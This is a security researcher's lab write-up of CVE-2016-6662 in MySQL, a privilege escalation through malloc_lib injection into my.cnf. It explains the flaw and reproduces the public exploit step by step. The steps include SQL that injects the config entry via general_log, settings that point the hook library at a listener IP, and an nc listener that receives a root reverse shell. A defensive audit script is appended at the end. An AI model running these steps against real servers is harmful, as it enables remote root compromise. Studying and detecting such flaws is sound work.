Analysis and practice of MySQL remote code execution/privilege escalation

Source: Internet
Author: User

0x00 background

On September 12, 2016, the security researcher Dawid Golunski published an advisory for a MySQL vulnerability that allows remote code execution and privilege escalation (CVE-2016-6662). After studying the original report, I made the following analysis and practice notes.

0x01 analysis

Vulnerability disclosure address: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html

Scope of impact (updated by the vulnerability author on September 16):

MySQL <= 5.7.14

MySQL <= 5.6.32

MySQL <= 5.5.51

After studying the original report, my summary is as follows.

Cause of the vulnerability:

1. MySQL's default installation package contains a mysqld_safe script that is used to start the mysqld server process.

2. This script can preload a shared library before the MySQL server starts, via the --malloc-lib=LIB parameter:

/usr/local/mysql/bin/mysqld_safe:

# set_malloc_lib LIB
# - If LIB is empty, do nothing and return
# - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib
#   then pkglibdir.  tcmalloc is part of the Google perftools project.
# - If LIB is an absolute path, assume it is a malloc shared library
#
# Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when
# running mysqld.  See ld.so for details.
set_malloc_lib() {
  malloc_lib="$1"

  if [ "$malloc_lib" = tcmalloc ]; then
    pkglibdir=`get_mysql_config --variable=pkglibdir`
    malloc_lib=
    # This list is kept intentionally simple.  Simply set --malloc-lib
    # to a full path if another location is desired.
    for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do
      for flavor in _minimal '' _and_profiler _debug; do
        tmp="$libdir/libtcmalloc$flavor.so"
        #log_notice "DEBUG: Checking for malloc lib '$tmp'"
        [ -r "$tmp" ] || continue
        malloc_lib="$tmp"
        break 2
      done
    done

    if [ -z "$malloc_lib" ]; then
      log_error "no shared library for --malloc-lib=tcmalloc found in /usr/lib or $pkglibdir"
      exit 1
    fi
  fi
3. The library to preload can also be specified in a MySQL configuration file (my.cnf), including one located in the MySQL data directory, $DATADIR/my.cnf:

/usr/local/mysql/bin/mysqld_safe:

# Try where the binary installs put it
if test -d $MY_BASEDIR_VERSION/data/mysql
then
  DATADIR=$MY_BASEDIR_VERSION/data
  if test -z "$defaults" -a -r "$DATADIR/my.cnf"
  then
    defaults="--defaults-extra-file=$DATADIR/my.cnf"
  fi
# Next try where the source installs put it
elif test -d $MY_BASEDIR_VERSION/var/mysql
then
  DATADIR=$MY_BASEDIR_VERSION/var
# Or just give up and use our compiled-in default
else
  DATADIR=/usr/local/mysql/data
fi
4. Once an attacker can inject a reference to a malicious shared library into my.cnf, the code in that preloaded library is executed with root privileges the next time the MySQL service is restarted.

Exploitation requirements:

A MySQL user with the FILE and SELECT privileges, which give access to the logging functions (normally only a MySQL administrator has these).

Exploitation scenarios:

1. A MySQL configuration file with weak or insecure permissions (writable by the mysql user) is used to inject malicious settings.

2. A new configuration file my.cnf is created in the MySQL data directory (writable by the mysql user by default) and malicious settings are injected into it.

Exploitation steps:

1. Use the MySQL logging function to create or modify the my.cnf file:

mysql> set global general_log_file = '/usr/local/mysql/data/my.cnf';
mysql> set global general_log = on;
mysql> select '
    '>
    '>; injected config entry
    '>
    '> [mysqld]
    '> malloc_lib=/tmp/mysql_exploit_lib.so
    '>
    '> [separator]
    '>
    '> ';
1 row in set (0.00 sec)
mysql> set global general_log = off;
2. Upload a shared library containing the malicious code and reference it from the [mysqld] section of my.cnf, for example:

[mysqld]
malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so'

3. Restart the MySQL service; the malicious code is then executed as root.

0x02 practice

Lab environment:

Ubuntu 16.04.1 LTS
MySQL 5.5.50

Practice steps:

1. MySQL installation and configuration: http://howtolamp.com/lamp/mysql/5.6/installing/

The directory layout after installation is as follows:

root@ubuntu:/home/avfisher# ls -l /usr/local/mysql/
total 72
drwxr-xr-x  2 mysql  4096 Sep 18 18:51 bin
-rw-r--r--  1 mysql 17987 May 16 17:46 COPYING
drwx------  6 mysql  4096 Sep 18 17:46 data
drwxr-xr-x  2 mysql  4096 Sep 13 23:58 docs
drwxr-xr-x  3 mysql  4096 Sep 13 19:17 include
-rw-r--r--  1 mysql   301 May 16 17:46 INSTALL-BINARY
drwxr-xr-x  3 mysql  4096 Sep 13 19:17 lib
drwxr-xr-x  4 mysql  4096 Sep 13 19:17 man
drwxr-xr-x 10 mysql  4096 Sep 13 19:17 mysql-test
-rw-r--r--  1 mysql  2496 May 16 17:46 README
drwxr-xr-x  2 mysql  4096 Sep 13 19:17 scripts
drwxr-xr-x 27 mysql  4096 Sep 13 19:17 share
drwxr-xr-x  4 mysql  4096 Sep 13 23:02 sql-bench
drwxr-xr-x  2 mysql  4096 Sep 18 17:52 support-files
2. Download the exploit files:

0ldSQL_MySQL_RCE_exploit.py: http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py
mysql_hookandroot_lib.c: http://legalhackers.com/exploits/mysql_hookandroot_lib.c
3. Find the MySQL data directory, in this case /usr/local/mysql/data:

root@ubuntu:/home/avfisher# ps aux | grep mysqld_safe
root  12592  0.0  0.0   4508  1780 pts/18  S   /bin/sh /usr/local/mysql/bin/mysqld_safe --datadir=/usr/local/mysql/data --pid-file=/usr/local/mysql/data/ubuntu.pid
root  13622  0.0  0.0  21296   940 pts/18  S+  grep --color=auto mysqld_safe
4. Modify the exploit files

0ldSQL_MySQL_RCE_exploit.py: modify line 161 as follows (note: this path is where the MySQL trigger file is written, i.e. the directory of the test database):

TRG_path = "/usr/local/mysql/data/%s/poctable.TRG" % args.TARGET_DB

mysql_hookandroot_lib.c: modify lines 63-65 as follows (the my.cnf path used here is /usr/local/mysql/data/my.cnf):

#define ATTACKERS_IP "<IP address of your listener>"
#define SHELL_PORT <your listening port>
#define INJECTED_CONF "<my.cnf file in your mysql data directory>"
5. Start the listener on the listener server:

[root@centos ~]# nc -lvv 8080
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
6. Create the test database and database user:

CREATE DATABASE pocdb;
GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!';
GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%';
7. Execute the 0ldSQL_MySQL_RCE_exploit.py script as follows:

root@ubuntu:/home/avfisher# python 0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass p0cpass! -dbhost 127.0.0.1 -dbname pocdb -mycnf /usr/local/mysql/data/my.cnf

0ldSQL_MySQL_RCE_exploit.py (ver. 1.0)
MySQL Remote Root Code Execution / Privesc PoC Exploit (CVE-2016-6662)

For testing purposes only. Do no harm.

Discovered/Coded:

Dawid Golunski
http://legalhackers.com


[+] Connecting to target server 127.0.0.1 and target mysql account 'attacker@127.0.0.1' using DB 'pocdb'

[+] The account in use has the following grants/perms:

GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD <secret>
GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'

[+] Compiling mysql_hookandroot_lib.so

[+] Converting mysql_hookandroot_lib.so into HEX

[+] Saving trigger payload into /usr/local/mysql/data/pocdb/poctable.TRG

[+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target

[+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded

[+] Inserting data to 'poctable' in order to execute the trigger and write data to the target mysql config /usr/local/mysql/data/my.cnf

[+] Showing the contents of /usr/local/mysql/data/my.cnf config to verify that our setting (malloc_lib) got injected

...
[+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :)

[+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :)

...
8. Restart the MySQL service to trigger the exploit:

root@ubuntu:/home/avfisher# /usr/local/mysql/support-files/mysql.server restart
9. The listener server receives the reverse shell:

[root@centos ~]# nc -lvv 8080
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Listening on :::8080
Ncat: Listening on 0.0.0.0:8080
Ncat: Connection from 192.168.1.92.
Ncat: Connection from 192.168.1.92:46192.
root@ubuntu:/usr/local/mysql# id
id
uid=0(root) gid=0(root) groups=0(root)

0x03 summary

While testing and practising this vulnerability, I noted the following:

1. The vulnerability author cleverly used a trigger to let an ordinary user execute the required SQL statements with root privileges, successfully bypassing MySQL's privilege restrictions on general_log_file operations.

2. The vulnerability author also provides a neat way to obtain the reverse shell: because the library is preloaded before mysqld starts, it can rewrite my.cnf before mysqld reads it, stripping the junk that the log injection left around the config entry so that the MySQL service still starts normally.

3. On the permissions of the my.cnf file in the MySQL data directory: running chown mysql:mysql my.cnf is not required at all; the exploit works as long as the following two conditions are met:

The mysql database user has write permission on my.cnf
my.cnf is not world-writable
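As an added example (not code from the original post or from the advisory), a small Python audit helper for defenders: it scans a MySQL option file for malloc_lib entries in the groups mysqld_safe acts on, tolerating the log junk that the general_log injection shown in 0x01 leaves around the entry, and classifies the file's permissions against the two conditions in point 3 above. The group names, the mysql uid/gid and the sample config are assumptions or constructed for the example.

```python
import os
import re
import stat
# Option groups whose malloc_lib entry mysqld_safe acts on (assumed set, see the excerpt in 0x01).
WATCHED_GROUPS = {"mysqld", "mysqld_safe", "server", "safe_mysqld"}
GROUP_RE = re.compile(r"^\s*\[([^\]]+)\]")
OPTION_RE = re.compile(r"^\s*(malloc[-_]lib)\s*=\s*['\"]?([^'\"\s]+)")

# Constructed sample: a my.cnf as left behind by the general_log trick, log lines around the entry.
SAMPLE_INJECTED_CNF = """\
/usr/local/mysql/bin/mysqld, Version: 5.5.50-log. started with:
160918 19:02:11     5 Query     select '
; injected config entry
[mysqld]
malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so
[separator]
'
160918 19:02:13     5 Query     set global general_log = off
"""

def find_malloc_lib(text):
    """Return [(group, path)] for every malloc_lib option inside a watched group.
    Lenient on purpose: non-option lines are skipped, so an entry buried in junk is still reported."""
    hits, group = [], None
    for line in text.splitlines():
        m = GROUP_RE.match(line)
        if m:
            group = m.group(1).strip().lower()
            continue
        m = OPTION_RE.match(line)
        if m and group in WATCHED_GROUPS:
            hits.append((group, m.group(2)))
    return hits

def mode_findings(mode, uid, gid, mysql_uid, mysql_gid):
    """Classify stat() values: writable by the mysql user (the dangerous case) or world-writable."""
    found = []
    if mode & stat.S_IWOTH:
        found.append("world-writable")
    if uid == mysql_uid and mode & stat.S_IWUSR:
        found.append("owner-writable by mysql user")
    elif gid == mysql_gid and mode & stat.S_IWGRP:
        found.append("group-writable by mysql group")
    return found

def audit_file(path, mysql_uid, mysql_gid):
    st = os.stat(path)  # e.g. path = "$DATADIR/my.cnf"; returns (permission findings, malloc_lib hits)
    with open(path, errors="replace") as fh:
        hits = find_malloc_lib(fh.read())
    return mode_findings(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid, mysql_uid, mysql_gid), hits
```

Run audit_file against every option file mysqld_safe reads (including the data-directory my.cnf); any malloc_lib hit or a file writable by the mysql user is worth investigating.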
